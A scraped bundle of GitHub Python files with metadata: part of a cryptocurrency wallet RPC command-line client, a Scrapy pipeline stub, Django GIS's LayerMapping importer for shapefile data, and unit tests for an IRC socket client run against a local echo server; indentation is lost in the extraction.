addr = raw_input("Enter a Dcoin address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
print access.gettransaction(data)
except:
print access.gettransaction()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
gen= raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = raw_input("Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = raw_input("Enter old wallet passphrase: ")
pwd2 = raw_input("Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported"
| {
"content_hash": "01a32b8fa2cdf31ca776735847431595",
"timestamp": "",
"source": "github",
"line_count": 324,
"max_line_length": 79,
"avg_line_length": 24.17283950617284,
"alnum_prop": 0.6615168539325843,
"repo_name": "wolske/dcoin",
"id": "760d028b9eb392bf5428f0a721b7fbe5c90f54a9",
"size": "7832",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "contrib/bitrpc/bitrpc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "32917"
},
{
"name": "C++",
"bytes": "16030131"
},
{
"name": "CSS",
"bytes": "1127"
},
{
"name": "Makefile",
"bytes": "97719"
},
{
"name": "Objective-C",
"bytes": "1052"
},
{
"name": "Objective-C++",
"bytes": "5864"
},
{
"name": "Python",
"bytes": "69699"
},
{
"name": "Shell",
"bytes": "13173"
},
{
"name": "TypeScript",
"bytes": "5223608"
}
],
"symlink_target": ""
} |
class PaystreamPipeline(object):
def process_item(self, item, spider):
return item
| {
"content_hash": "f61f99395228f0006f6f4ec34f82f55b",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 41,
"avg_line_length": 31.666666666666668,
"alnum_prop": 0.6947368421052632,
"repo_name": "munhitsu/paystream-scrap",
"id": "1ea160b3d97980aef90f144d0aed2950bc1b394f",
"size": "263",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "paystream/pipelines/pipelines.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "16467"
}
],
"symlink_target": ""
} |
"""
The LayerMapping class provides a way to map the contents of OGR
vector files (e.g. SHP files) to Geographic-enabled Django models.
This grew out of my personal needs, specifically the code repetition
that went into pulling geometries and fields out of an OGR layer,
converting to another coordinate system (e.g. WGS84), and then inserting
into a GeoDjango model.
Please report any bugs encountered using this utility.
Requirements: OGR C Library (from GDAL) required.
Usage:
lm = LayerMapping(model, source_file, mapping) where,
model:
GeoDjango model (not an instance)
data:
OGR-supported data source file (e.g. a shapefile) or
gdal.DataSource instance
mapping:
A python dictionary, keys are strings corresponding
to the GeoDjango model field, and values correspond to
string field names for the OGR feature, or if the model field
is a geographic then it should correspond to the OGR
geometry type, e.g. 'POINT', 'LINESTRING', 'POLYGON'.
Keyword Args:
layer:
The index of the layer to use from the Data Source (defaults to 0)
source_srs:
Use this to specify the source SRS manually (for example,
some shapefiles don't come with a '.prj' file). An integer SRID,
a string WKT, and SpatialReference objects are valid parameters.
encoding:
Specifies the encoding of the string in the OGR data source.
For example, 'latin-1', 'utf-8', and 'cp437' are all valid
encoding parameters.
transaction_mode:
May be 'commit_on_success' (default) or 'autocommit'.
transform:
Setting this to False will disable all coordinate transformations.
unique:
Setting this to the name, or a tuple of names, from the given
model will create models unique only to the given name(s).
Geometries will from each feature will be added into the collection
associated with the unique model. Forces transaction mode to
be 'autocommit'.
Example:
1. You need a GDAL-supported data source, like a shapefile.
Assume we're using the test_poly SHP file:
>>> from django.contrib.gis.gdal import DataSource
>>> ds = DataSource('test_poly.shp')
>>> layer = ds[0]
>>> print layer.fields # Exploring the fields in the layer, we only want the 'str' field.
['float', 'int', 'str']
>>> print len(layer) # getting the number of features in the layer (should be 3)
3
>>> print layer.geom_type # Should be 3 (a Polygon)
3
>>> print layer.srs # WGS84
GEOGCS["GCS_WGS_1984",
DATUM["WGS_1984",
SPHEROID["WGS_1984",6378137,298.257223563]],
PRIMEM["Greenwich",0],
UNIT["Degree",0.017453292519943295]]
2. Now we define our corresponding Django model (make sure to use syncdb):
from django.contrib.gis.db import models
class TestGeo(models.Model, models.GeoMixin):
name = models.CharField(maxlength=25) # corresponds to the 'str' field
poly = models.PolygonField(srid=4269) # we want our model in a different SRID
objects = models.GeoManager()
def __str__(self):
return 'Name: %s' % self.name
3. Use LayerMapping to extract all the features and place them in the database:
>>> from django.contrib.gis.utils import LayerMapping
>>> from geoapp.models import TestGeo
>>> mapping = {'name' : 'str', # The 'name' model field maps to the 'str' layer field.
'poly' : 'POLYGON', # For geometry fields use OGC name.
} # The mapping is a dictionary
>>> lm = LayerMapping(TestGeo, 'test_poly.shp', mapping)
>>> lm.save(verbose=True) # Save the layermap, imports the data.
Saved: Name: 1
Saved: Name: 2
Saved: Name: 3
LayerMapping just transformed the three geometries from the SHP file from their
source spatial reference system (WGS84) to the spatial reference system of
the GeoDjango model (NAD83). If no spatial reference system is defined for
the layer, use the `source_srs` keyword with a SpatialReference object to
specify one.
"""
import sys
from datetime import date, datetime
from decimal import Decimal
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.gis.db.models import GeometryField
from django.contrib.gis.db.backend import SpatialBackend
from django.contrib.gis.gdal import CoordTransform, DataSource, \
OGRException, OGRGeometry, OGRGeomType, SpatialReference
from django.contrib.gis.gdal.field import \
OFTDate, OFTDateTime, OFTInteger, OFTReal, OFTString, OFTTime
from django.contrib.gis.models import GeometryColumns, SpatialRefSys
from django.db import models, transaction
# LayerMapping exceptions.
class LayerMapError(Exception): pass
class InvalidString(LayerMapError): pass
class InvalidDecimal(LayerMapError): pass
class InvalidInteger(LayerMapError): pass
class MissingForeignKey(LayerMapError): pass
class LayerMapping(object):
"A class that maps OGR Layers to GeoDjango Models."
# Acceptable 'base' types for a multi-geometry type.
MULTI_TYPES = {1 : OGRGeomType('MultiPoint'),
2 : OGRGeomType('MultiLineString'),
3 : OGRGeomType('MultiPolygon'),
}
# Acceptable Django field types and corresponding acceptable OGR
# counterparts.
FIELD_TYPES = {
models.AutoField : OFTInteger,
models.IntegerField : (OFTInteger, OFTReal, OFTString),
models.FloatField : (OFTInteger, OFTReal),
models.DateField : OFTDate,
models.DateTimeField : OFTDateTime,
models.EmailField : OFTString,
models.TimeField : OFTTime,
models.DecimalField : (OFTInteger, OFTReal),
models.CharField : OFTString,
models.SlugField : OFTString,
models.TextField : OFTString,
models.URLField : OFTString,
models.USStateField : OFTString,
models.XMLField : OFTString,
models.SmallIntegerField : (OFTInteger, OFTReal, OFTString),
models.PositiveSmallIntegerField : (OFTInteger, OFTReal, OFTString),
}
# The acceptable transaction modes.
TRANSACTION_MODES = {'autocommit' : transaction.autocommit,
'commit_on_success' : transaction.commit_on_success,
}
def __init__(self, model, data, mapping, layer=0,
source_srs=None, encoding=None,
transaction_mode='commit_on_success',
transform=True, unique=None):
"""
A LayerMapping object is initialized using the given Model (not an instance),
a DataSource (or string path to an OGR-supported data file), and a mapping
dictionary. See the module level docstring for more details and keyword
argument usage.
"""
# Getting the DataSource and the associated Layer.
if isinstance(data, basestring):
self.ds = DataSource(data)
else:
self.ds = data
self.layer = self.ds[layer]
# Setting the mapping
self.mapping = mapping
# Setting the model, and getting the geometry column associated
# with the model (an exception will be raised if there is no
# geometry column).
self.model = model
self.geo_col = self.geometry_column()
# Checking the source spatial reference system, and getting
# the coordinate transformation object (unless the `transform`
# keyword is set to False)
if transform:
self.source_srs = self.check_srs(source_srs)
self.transform = self.coord_transform()
else:
self.transform = transform
# Checking the layer -- intitialization of the object will fail if
# things don't check out before hand.
self.check_layer()
# Setting the encoding for OFTString fields, if specified.
if encoding:
# Making sure the encoding exists, if not a LookupError
# exception will be thrown.
from codecs import lookup
lookup(encoding)
self.encoding = encoding
else:
self.encoding = None
if unique:
self.check_unique(unique)
transaction_mode = 'autocommit' # Has to be set to autocommit.
self.unique = unique
else:
self.unique = None
# Setting the transaction decorator with the function in the
# transaction modes dictionary.
if transaction_mode in self.TRANSACTION_MODES:
self.transaction_decorator = self.TRANSACTION_MODES[transaction_mode]
self.transaction_mode = transaction_mode
else:
raise LayerMapError('Unrecognized transaction mode: %s' % transaction_mode)
#### Checking routines used during initialization ####
def check_fid_range(self, fid_range):
"This checks the `fid_range` keyword."
if fid_range:
if isinstance(fid_range, (tuple, list)):
return slice(*fid_range)
elif isinstance(fid_range, slice):
return fid_range
else:
raise TypeError
else:
return None
def check_layer(self):
"""
This checks the Layer metadata, and ensures that it is compatible
with the mapping information and model. Unlike previous revisions,
there is no need to increment through each feature in the Layer.
"""
# The geometry field of the model is set here.
# TODO: Support more than one geometry field / model.
self.geom_field = False
self.fields = {}
# Getting lists of the field names and the field types available in
# the OGR Layer.
ogr_fields = self.layer.fields
ogr_field_types = self.layer.field_types
# Function for determining if the OGR mapping field is in the Layer.
def check_ogr_fld(ogr_map_fld):
try:
idx = ogr_fields.index(ogr_map_fld)
except ValueError:
raise LayerMapError('Given mapping OGR field "%s" not found in OGR Layer.' % ogr_map_fld)
return idx
# No need to increment through each feature in the model, simply check
# the Layer metadata against what was given in the mapping dictionary.
for field_name, ogr_name in self.mapping.items():
# Ensuring that a corresponding field exists in the model
# for the given field name in the mapping.
try:
model_field = self.model._meta.get_field(field_name)
except models.fields.FieldDoesNotExist:
raise LayerMapError('Given mapping field "%s" not in given Model fields.' % field_name)
# Getting the string name for the Django field class (e.g., 'PointField').
fld_name = model_field.__class__.__name__
if isinstance(model_field, GeometryField):
if self.geom_field:
raise LayerMapError('LayerMapping does not support more than one GeometryField per model.')
try:
gtype = OGRGeomType(ogr_name)
except OGRException:
raise LayerMapError('Invalid mapping for GeometryField "%s".' % field_name)
# Making sure that the OGR Layer's Geometry is compatible.
ltype = self.layer.geom_type
if not (gtype == ltype or self.make_multi(ltype, model_field)):
raise LayerMapError('Invalid mapping geometry; model has %s, feature has %s.' % (fld_name, gtype))
# Setting the `geom_field` attribute w/the name of the model field
# that is a Geometry.
self.geom_field = field_name
fields_val = model_field
elif isinstance(model_field, models.ForeignKey):
if isinstance(ogr_name, dict):
# Is every given related model mapping field in the Layer?
rel_model = model_field.rel.to
for rel_name, ogr_field in ogr_name.items():
idx = check_ogr_fld(ogr_field)
try:
rel_field = rel_model._meta.get_field(rel_name)
except models.fields.FieldDoesNotExist:
raise LayerMapError('ForeignKey mapping field "%s" not in %s fields.' %
(rel_name, rel_model.__class__.__name__))
fields_val = rel_model
else:
raise TypeError('ForeignKey mapping must be of dictionary type.')
else:
# Is the model field type supported by LayerMapping?
if not model_field.__class__ in self.FIELD_TYPES:
raise LayerMapError('Django field type "%s" has no OGR mapping (yet).' % fld_name)
# Is the OGR field in the Layer?
idx = check_ogr_fld(ogr_name)
ogr_field = ogr_field_types[idx]
# Can the OGR field type be mapped to the Django field type?
if not issubclass(ogr_field, self.FIELD_TYPES[model_field.__class__]):
raise LayerMapError('OGR field "%s" (of type %s) cannot be mapped to Django %s.' %
(ogr_field, ogr_field.__name__, fld_name))
fields_val = model_field
self.fields[field_name] = fields_val
def check_srs(self, source_srs):
"Checks the compatibility of the given spatial reference object."
if isinstance(source_srs, SpatialReference):
sr = source_srs
elif isinstance(source_srs, SpatialRefSys):
sr = source_srs.srs
elif isinstance(source_srs, (int, basestring)):
sr = SpatialReference(source_srs)
else:
# Otherwise just pulling the SpatialReference from the layer
sr = self.layer.srs
if not sr:
raise LayerMapError('No source reference system defined.')
else:
return sr
def check_unique(self, unique):
"Checks the `unique` keyword parameter -- may be a sequence or string."
if isinstance(unique, (list, tuple)):
# List of fields to determine uniqueness with
for attr in unique:
if not attr in self.mapping: raise ValueError
elif isinstance(unique, basestring):
# Only a single field passed in.
if unique not in self.mapping: raise ValueError
else:
raise TypeError('Unique keyword argument must be set with a tuple, list, or string.')
#### Keyword argument retrieval routines ####
def feature_kwargs(self, feat):
"""
Given an OGR Feature, this will return a dictionary of keyword arguments
for constructing the mapped model.
"""
# The keyword arguments for model construction.
kwargs = {}
# Incrementing through each model field and OGR field in the
# dictionary mapping.
for field_name, ogr_name in self.mapping.items():
model_field = self.fields[field_name]
if isinstance(model_field, GeometryField):
# Verify OGR geometry.
val = self.verify_geom(feat.geom, model_field)
elif isinstance(model_field, models.base.ModelBase):
# The related _model_, not a field was passed in -- indicating
# another mapping for the related Model.
val = self.verify_fk(feat, model_field, ogr_name)
else:
# Otherwise, verify OGR Field type.
val = self.verify_ogr_field(feat[ogr_name], model_field)
# Setting the keyword arguments for the field name with the
# value obtained above.
kwargs[field_name] = val
return kwargs
def unique_kwargs(self, kwargs):
"""
Given the feature keyword arguments (from `feature_kwargs`) this routine
will construct and return the uniqueness keyword arguments -- a subset
of the feature kwargs.
"""
if isinstance(self.unique, basestring):
return {self.unique : kwargs[self.unique]}
else:
return dict((fld, kwargs[fld]) for fld in self.unique)
#### Verification routines used in constructing model keyword arguments. ####
def verify_ogr_field(self, ogr_field, model_field):
"""
Verifies if the OGR Field contents are acceptable to the Django
model field. If they are, the verified value is returned,
otherwise the proper exception is raised.
"""
if (isinstance(ogr_field, OFTString) and
isinstance(model_field, (models.CharField, models.TextField))):
if self.encoding:
# The encoding for OGR data sources may be specified here
# (e.g., 'cp437' for Census Bureau boundary files).
val = unicode(ogr_field.value, self.encoding)
else:
val = ogr_field.value
if len(val) > model_field.max_length:
raise InvalidString('%s model field maximum string length is %s, given %s characters.' %
(model_field.name, model_field.max_length, len(val)))
elif isinstance(ogr_field, OFTReal) and isinstance(model_field, models.DecimalField):
try:
# Creating an instance of the Decimal value to use.
d = Decimal(str(ogr_field.value))
except:
raise InvalidDecimal('Could not construct decimal from: %s' % ogr_field.value)
# Getting the decimal value as a tuple.
dtup = d.as_tuple()
digits = dtup[1]
d_idx = dtup[2] # index where the decimal is
# Maximum amount of precision, or digits to the left of the decimal.
max_prec = model_field.max_digits - model_field.decimal_places
# Getting the digits to the left of the decimal place for the
# given decimal.
if d_idx < 0:
n_prec = len(digits[:d_idx])
else:
n_prec = len(digits) + d_idx
# If we have more than the maximum digits allowed, then throw an
# InvalidDecimal exception.
if n_prec > max_prec:
raise InvalidDecimal('A DecimalField with max_digits %d, decimal_places %d must round to an absolute value less than 10^%d.' %
(model_field.max_digits, model_field.decimal_places, max_prec))
val = d
elif isinstance(ogr_field, (OFTReal, OFTString)) and isinstance(model_field, models.IntegerField):
# Attempt to convert any OFTReal and OFTString value to an OFTInteger.
try:
val = int(ogr_field.value)
except:
raise InvalidInteger('Could not construct integer from: %s' % ogr_field.value)
else:
val = ogr_field.value
return val
def verify_fk(self, feat, rel_model, rel_mapping):
"""
Given an OGR Feature, the related model and its dictionary mapping,
this routine will retrieve the related model for the ForeignKey
mapping.
"""
# TODO: It is expensive to retrieve a model for every record --
# explore if an efficient mechanism exists for caching related
# ForeignKey models.
# Constructing and verifying the related model keyword arguments.
fk_kwargs = {}
for field_name, ogr_name in rel_mapping.items():
fk_kwargs[field_name] = self.verify_ogr_field(feat[ogr_name], rel_model._meta.get_field(field_name))
# Attempting to retrieve and return the related model.
try:
return rel_model.objects.get(**fk_kwargs)
except ObjectDoesNotExist:
raise MissingForeignKey('No ForeignKey %s model found with keyword arguments: %s' % (rel_model.__name__, fk_kwargs))
def verify_geom(self, geom, model_field):
"""
Verifies the geometry -- will construct and return a GeometryCollection
if necessary (for example if the model field is MultiPolygonField while
the mapped shapefile only contains Polygons).
"""
if self.make_multi(geom.geom_type, model_field):
# Constructing a multi-geometry type to contain the single geometry
multi_type = self.MULTI_TYPES[geom.geom_type.num]
g = OGRGeometry(multi_type)
g.add(geom)
else:
g = geom
# Transforming the geometry with our Coordinate Transformation object,
# but only if the class variable `transform` is set w/a CoordTransform
# object.
if self.transform: g.transform(self.transform)
# Returning the WKT of the geometry.
return g.wkt
#### Other model methods ####
def coord_transform(self):
"Returns the coordinate transformation object."
try:
# Getting the target spatial reference system
target_srs = SpatialRefSys.objects.get(srid=self.geo_col.srid).srs
# Creating the CoordTransform object
return CoordTransform(self.source_srs, target_srs)
except Exception, msg:
raise LayerMapError('Could not translate between the data source and model geometry: %s' % msg)
def geometry_column(self):
"Returns the GeometryColumn model associated with the geographic column."
# Getting the GeometryColumn object.
try:
db_table = self.model._meta.db_table
if SpatialBackend.name == 'oracle': db_table = db_table.upper()
gc_kwargs = {GeometryColumns.table_name_col() : db_table}
return GeometryColumns.objects.get(**gc_kwargs)
except Exception, msg:
raise LayerMapError('Geometry column does not exist for model. (did you run syncdb?):\n %s' % msg)
def make_multi(self, geom_type, model_field):
"""
Given the OGRGeomType for a geometry and its associated GeometryField,
determine whether the geometry should be turned into a GeometryCollection.
"""
return (geom_type.num in self.MULTI_TYPES and
model_field.__class__.__name__ == 'Multi%s' % geom_type.django)
def save(self, verbose=False, fid_range=False, step=False,
progress=False, silent=False, stream=sys.stdout, strict=False):
"""
Saves the contents from the OGR DataSource Layer into the database
according to the mapping dictionary given at initialization.
Keyword Parameters:
verbose:
If set, information will be printed subsequent to each model save
executed on the database.
fid_range:
May be set with a slice or tuple of (begin, end) feature ID's to map
from the data source. In other words, this keyword enables the user
to selectively import a subset range of features in the geographic
data source.
step:
If set with an integer, transactions will occur at every step
interval. For example, if step=1000, a commit would occur after
the 1,000th feature, the 2,000th feature etc.
progress:
When this keyword is set, status information will be printed giving
the number of features processed and sucessfully saved. By default,
progress information will pe printed every 1000 features processed,
however, this default may be overridden by setting this keyword with an
integer for the desired interval.
stream:
Status information will be written to this file handle. Defaults to
using `sys.stdout`, but any object with a `write` method is supported.
silent:
By default, non-fatal error notifications are printed to stdout, but
this keyword may be set to disable these notifications.
strict:
Execution of the model mapping will cease upon the first error
encountered. The default behavior is to attempt to continue.
"""
# Getting the default Feature ID range.
default_range = self.check_fid_range(fid_range)
# Setting the progress interval, if requested.
if progress:
if progress is True or not isinstance(progress, int):
progress_interval = 1000
else:
progress_interval = progress
# Defining the 'real' save method, utilizing the transaction
# decorator created during initialization.
@self.transaction_decorator
def _save(feat_range=default_range, num_feat=0, num_saved=0):
if feat_range:
layer_iter = self.layer[feat_range]
else:
layer_iter = self.layer
for feat in layer_iter:
num_feat += 1
# Getting the keyword arguments
try:
kwargs = self.feature_kwargs(feat)
except LayerMapError, msg:
# Something borked the validation
if strict: raise
elif not silent:
stream.write('Ignoring Feature ID %s because: %s\n' % (feat.fid, msg))
else:
# Constructing the model using the keyword args
is_update = False
if self.unique:
# If we want unique models on a particular field, handle the
# geometry appropriately.
try:
# Getting the keyword arguments and retrieving
# the unique model.
u_kwargs = self.unique_kwargs(kwargs)
m = self.model.objects.get(**u_kwargs)
is_update = True
# Getting the geometry (in OGR form), creating
# one from the kwargs WKT, adding in additional
# geometries, and update the attribute with the
# just-updated geometry WKT.
geom = getattr(m, self.geom_field).ogr
new = OGRGeometry(kwargs[self.geom_field])
for g in new: geom.add(g)
setattr(m, self.geom_field, geom.wkt)
except ObjectDoesNotExist:
# No unique model exists yet, create.
m = self.model(**kwargs)
else:
m = self.model(**kwargs)
try:
# Attempting to save.
m.save()
num_saved += 1
if verbose: stream.write('%s: %s\n' % (is_update and 'Updated' or 'Saved', m))
except SystemExit:
raise
except Exception, msg:
if self.transaction_mode == 'autocommit':
# Rolling back the transaction so that other model saves
# will work.
transaction.rollback_unless_managed()
if strict:
# Bailing out if the `strict` keyword is set.
if not silent:
stream.write('Failed to save the feature (id: %s) into the model with the keyword arguments:\n' % feat.fid)
stream.write('%s\n' % kwargs)
raise
elif not silent:
stream.write('Failed to save %s:\n %s\nContinuing\n' % (kwargs, msg))
# Printing progress information, if requested.
if progress and num_feat % progress_interval == 0:
stream.write('Processed %d features, saved %d ...\n' % (num_feat, num_saved))
# Only used for status output purposes -- incremental saving uses the
# values returned here.
return num_saved, num_feat
nfeat = self.layer.num_feat
if step and isinstance(step, int) and step < nfeat:
# Incremental saving is requested at the given interval (step)
if default_range:
raise LayerMapError('The `step` keyword may not be used in conjunction with the `fid_range` keyword.')
beg, num_feat, num_saved = (0, 0, 0)
indices = range(step, nfeat, step)
n_i = len(indices)
for i, end in enumerate(indices):
# Constructing the slice to use for this step; the last slice is
# special (e.g, [100:] instead of [90:100]).
if i+1 == n_i: step_slice = slice(beg, None)
else: step_slice = slice(beg, end)
try:
num_feat, num_saved = _save(step_slice, num_feat, num_saved)
beg = end
except:
stream.write('%s\nFailed to save slice: %s\n' % ('=-' * 20, step_slice))
raise
else:
# Otherwise, just calling the previously defined _save() function.
_save()
| {
"content_hash": "796213135201c47156cf05d098a77560",
"timestamp": "",
"source": "github",
"line_count": 676,
"max_line_length": 142,
"avg_line_length": 44.01627218934911,
"alnum_prop": 0.592135775499916,
"repo_name": "Shrews/PyGerrit",
"id": "40d2e97278459f5bde964f1b8eb1196bfd6f338b",
"size": "29814",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "webapp/django/contrib/gis/utils/layermapping.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Java",
"bytes": "157968"
},
{
"name": "JavaScript",
"bytes": "181665"
},
{
"name": "Python",
"bytes": "3224616"
},
{
"name": "Shell",
"bytes": "6903"
}
],
"symlink_target": ""
} |
"""
Copyright (c) 2014 Dan Obermiller
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
You should have received a copy of the MIT License along with this program.
If not, see <http://opensource.org/licenses/MIT>
"""
try:
import cStringIO as IO
except ImportError:
import StringIO as IO
finally:
from contextlib import closing, contextmanager
import select
import socket
import sys
import threading
import time
import unittest
from testfixtures import LogCapture
import IRC_sockselect as IRC
@contextmanager
def capture():
oldout, olderr = sys.stdout, sys.stderr
try:
out=[IO.StringIO(), IO.StringIO()]
sys.stdout, sys.stderr = out
yield out
finally:
sys.stdout, sys.stderr = oldout, olderr
out[0] = out[0].getvalue()
out[1] = out[1].getvalue()
def client_thread(client_socket, client_event):
while not client_event.isSet():
ready, _, _ = select.select([client_socket],
[],
[])
if ready:
try:
message = client_socket.recv(1024)
except socket.error:
## Takes care of race conditions due to test_leave_server
client_socket.close()
client_event.set()
else:
if 'Done' in message:
client_socket.close()
client_event.set()
else:
client_socket.send(message)
return
class ServerSocket(threading.Thread):
def __init__(self, hostname='localhost', port=10000, timeout=100000):
super(ServerSocket, self).__init__()
self.hostname = hostname
self.port = port
self.timeout = timeout
self.now = time.time()
self.event = threading.Event()
# Maps from a thread ID to a tuple of form
# (socket, threading.Event, threading.Thread)
self.clients = {}
def run(self):
with closing(socket.socket(socket.AF_INET,
socket.SOCK_STREAM)) as self.server:
self.server.bind((self.hostname, self.port))
self.server.listen(5)
while not self.event.isSet():
connection, _ = self.server.accept()
if connection:
event = threading.Event()
client = threading.Thread(target=client_thread,
args=(connection,
event))
client.start()
self.clients[client.ident] = connection, event, client
for id_, (socket_, event_, client_) in self.clients.items():
if event_.isSet():
client_.join()
del self.clients[id_]
class test_sockselect(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.server = ServerSocket()
cls.server.start()
cls.log_capture = LogCapture()
@classmethod
def tearDownClass(cls):
cls.server.event.set()
cls.server.join()
cls.log_capture.uninstall()
def setUp(self):
self.IRC_ = IRC.IRC_member("Nickname")
def tearDown(self):
for server in self.IRC_.servers:
self.IRC_.send_server_message(server, 'Done')
def test_join_server(self):
self.assertEqual(self.IRC_.join_server('localhost',
10000),
0)
map(self.assertEqual,
[self.IRC_.nick, self.IRC_.ident, self.IRC_.realname],
['Nickname']*3
)
def test_join_server2(self):
self.assertEqual(self.IRC_.join_server('localhost',
port=10000,
nick="Nick",
ident="Ident",
realname="Realname"),
0)
map(self.assertEqual,
[self.IRC_.serv_to_data['localhost']['nick'],
self.IRC_.serv_to_data['localhost']['ident'],
self.IRC_.serv_to_data['localhost']['realname'],
],
['Nick', 'Ident', 'Realname']
)
def test_leave_server(self):
self.IRC_.join_server('localhost', 10000)
self.assertEqual(self.IRC_.leave_server('localhost'),
0)
def test_join_channel(self):
self.IRC_.join_server('localhost', 10000)
self.assertEqual(self.IRC_.join_channel('localhost',
'#temp-channel'),
0)
def test_leave_channel(self):
self.IRC_.join_server('localhost', 10000)
self.IRC_.join_channel('localhost', '#tchannel')
self.assertEqual(self.IRC_.leave_channel('localhost', '#tchannel'), 0)
def test_send_server_message(self):
self.IRC_.join_server('localhost', 10000)
self.assertEqual(self.IRC_.send_server_message('localhost',
'anything'),
0)
def test_send_channel_message(self):
self.IRC_.join_server('localhost', 10000)
self.IRC_.join_channel('localhost', '#temp-channel')
self.assertEqual(self.IRC_.send_channel_message('localhost',
'#temp-channel',
'anything'),
0)
def test_send_priv_message(self):
self.IRC_.join_server('localhost', 10000)
self.assertEqual(self.IRC_.send_privmsg('localhost',
'some_user',
'anything'),
0)
def test_receive_all_messages(self):
self.IRC_.replies['localhost'] = []
self.IRC_.join_server('localhost', 10000)
map(self.IRC_.send_server_message,
['localhost']*3,
['whatever', 'something else', 'last thing'])
with capture():
self.assertEqual(self.IRC_.receive_all_messages(), 0)
def test_receive_message(self):
self.IRC_.replies['localhost'] = []
self.IRC_.join_server('localhost', 10000)
map(self.IRC_.send_server_message,
['localhost']*3,
['whatever', 'something else', 'last thing'])
self.IRC_.receive_message(('localhost',))
self.assertEqual(self.IRC_.replies['localhost'],
[
'NICK Nickname',
'USER Nickname Nickname bla: Nickname',
'whatever',
'something else',
'last thing'
]
)
if __name__ == '__main__':
